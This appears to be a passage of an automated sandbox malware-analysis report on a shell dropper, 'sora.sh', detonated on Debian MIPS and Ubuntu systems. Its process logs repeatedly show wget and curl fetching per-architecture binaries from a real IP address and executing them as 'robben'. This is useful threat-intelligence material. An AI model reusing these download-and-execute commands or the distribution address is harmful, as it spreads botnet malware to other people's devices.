File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-VTggM8]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-VTggM8]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:21

Platform

debian9-mipsbe-20240418-en

Max time kernel

88s

Max time network

89s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:31

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

196s

Max time network

385s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A